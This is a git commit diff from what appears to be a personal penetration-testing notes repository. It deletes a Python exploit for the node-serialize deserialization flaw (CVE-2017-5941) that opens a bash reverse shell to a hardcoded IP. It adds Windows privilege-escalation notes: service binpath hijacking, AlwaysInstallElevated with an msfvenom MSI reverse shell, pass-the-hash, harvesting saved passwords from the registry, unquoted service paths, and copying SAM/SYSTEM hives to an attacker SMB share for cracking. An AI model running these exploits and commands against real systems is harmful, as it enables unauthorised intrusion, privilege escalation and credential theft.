bump
This commit is contained in:
parent
2c02116916
commit
b35bcc5560
47
49552.py
47
49552.py
|
@ -1,47 +0,0 @@
|
|||
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
|
||||
# Exploit Author: UndeadLarva
|
||||
# Software Link: https://www.npmjs.com/package/node-serialize
|
||||
# Version: 0.0.4
|
||||
# CVE: CVE-2017-5941
|
||||
|
||||
import requests
|
||||
import re
|
||||
import base64
|
||||
import sys
|
||||
|
||||
url = 'http://10.10.216.3/' # change this
|
||||
|
||||
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
|
||||
"return function () {"
|
||||
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
|
||||
"console.log('still inside');"
|
||||
"const { exec } = require('child_process');"
|
||||
"exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1');" # change this
|
||||
"}"
|
||||
"})(require('http').ServerResponse.prototype.end)")
|
||||
|
||||
# rce = "_$$ND_FUNC$$_process.exit(0)"
|
||||
#code ="_$$ND_FUNC$$_console.log('behind you')"
|
||||
#code = "_$$ND_FUNC$$_" + "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}"
|
||||
#code = "_$$ND_FUNC$$_" + payload
|
||||
|
||||
code = "_$$ND_FUNC$$_console.log(1)()"
|
||||
#code = "_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });()"
|
||||
#string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
|
||||
#code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" # change this
|
||||
code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();"
|
||||
string = '{"email": "'+code+'"}'
|
||||
|
||||
print code
|
||||
|
||||
cookie = {'session':base64.b64encode(string)}
|
||||
|
||||
response = requests.post(url+"?email="+code).text
|
||||
print response
|
||||
|
||||
#try:
|
||||
# response = requests.get(url, cookies=cookie).text
|
||||
# print response
|
||||
#except requests.exceptions.RequestException as e:
|
||||
# print('Oops!')
|
||||
# sys.exit(1)
|
|
@ -89,9 +89,28 @@ regjump HKLM
|
|||
```
|
||||
reg query HKLM
|
||||
```
|
||||
```
|
||||
Get-Item
|
||||
Get-ItemProperty
|
||||
```
|
||||
|
||||
## Strings
|
||||
Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
|
||||
|
||||
## Create a system authority shell
|
||||
1. Check permissons
|
||||
```sh
|
||||
accesschk.exe /accepteula -uwcqv user <serviceName>
|
||||
```
|
||||
2. Query service
|
||||
```sh
|
||||
sq qc <service>
|
||||
```
|
||||
3. Set service config to the msfvenom reverse shell, uploaded previously.
|
||||
```
|
||||
sc config daclsvc binpath= "\"C:\shell.exe""
|
||||
```
|
||||
4. Start service and gain high priv shell
|
||||
```sh
|
||||
net start daclsvc
|
||||
```
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
# AlwaysInstalledElevated
|
||||
|
||||
* Watch out for `AlwaysInstalledElevated` keys inside the registry via
|
||||
```sh
|
||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
```
|
||||
* Prepare reverse shell on attacker as an msi file
|
||||
```
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi
|
||||
```
|
||||
* start the msi on target
|
||||
```sh
|
||||
msiexec /quiet /qn /i C:\shell.msi
|
||||
```
|
||||
|
||||
|
|
@ -0,0 +1,7 @@
|
|||
# Pass the Hash
|
||||
|
||||
* Authenticate with retrieved hash
|
||||
* User evil-winrm or
|
||||
```
|
||||
pth-winexe -U 'admin%hash' //<target-IP> cmd.exe
|
||||
```
|
|
@ -0,0 +1,25 @@
|
|||
# Password Inside Registry Key
|
||||
|
||||
* Query passwords saved inside the registry
|
||||
```sh
|
||||
reg query HKLM /f password /t REG_SZ /s
|
||||
```
|
||||
* Admin Autologon credentials
|
||||
```
|
||||
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
|
||||
```
|
||||
* On attacker, change the credentials on target
|
||||
```sh
|
||||
winexe -U 'admin%password' //<target-IP> cmd.exe
|
||||
```
|
||||
|
||||
## List other Creds
|
||||
```
|
||||
cmdkey /list
|
||||
```
|
||||
* Open reverse shell
|
||||
```sh
|
||||
runas /savecred /user:admin C:\shell.exe
|
||||
```
|
||||
|
||||
|
|
@ -0,0 +1,7 @@
|
|||
# Potatoes
|
||||
|
||||
* [Hot Potato](https://foxglovesecurity.com/2016/01/16/hot-potato/)
|
||||
* [Rotten Potato](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
|
||||
* [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
|
||||
* [Juicy Potato](https://ohpe.it/juicy-potato/)
|
||||
* [Rogue Potato](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
|
|
@ -0,0 +1,13 @@
|
|||
# Unquoted Path
|
||||
|
||||
* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
|
||||
* Some part of path has to be writeable.
|
||||
## Example
|
||||
* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
|
||||
```sh
|
||||
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
|
||||
```
|
||||
```sh
|
||||
net start <service>
|
||||
```
|
||||
|
|
@ -6,3 +6,19 @@ save HKLM\SAM C:\Users\Administrator\Desktop\SAM
|
|||
save HKLM\SAM C:\Users\Administrator\Desktop\System
|
||||
```
|
||||
* Use `samdump2`
|
||||
|
||||
## Extract Hashes
|
||||
* Extract via smb server on attacker
|
||||
```
|
||||
copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
|
||||
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
|
||||
```
|
||||
* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
|
||||
```
|
||||
python pwdump.py SYSTEM SAM
|
||||
```
|
||||
or
|
||||
```
|
||||
hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
||||
```
|
||||
|
||||
|
|
|
@ -20,7 +20,7 @@ msfvenom -p <payload> <options>
|
|||
## Windows
|
||||
### x64 Reverse Shell in exe format
|
||||
```
|
||||
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
|
||||
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
|
||||
```
|
||||
|
||||
### x86 shikata_ga_nai
|
||||
|
@ -51,6 +51,15 @@ or on cmd.exe
|
|||
```sh
|
||||
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe
|
||||
```
|
||||
* Using SMB
|
||||
On attacker
|
||||
```sh
|
||||
sudo python impacket/examples/smbserver.py dir .
|
||||
```
|
||||
on target
|
||||
```sh
|
||||
copy \\<attacker-IP>\dir\shell.exe C:\shell.exe
|
||||
```
|
||||
|
||||
## Unix
|
||||
### netcat reverse
|
||||
|
|
Loading…
Reference in New Issue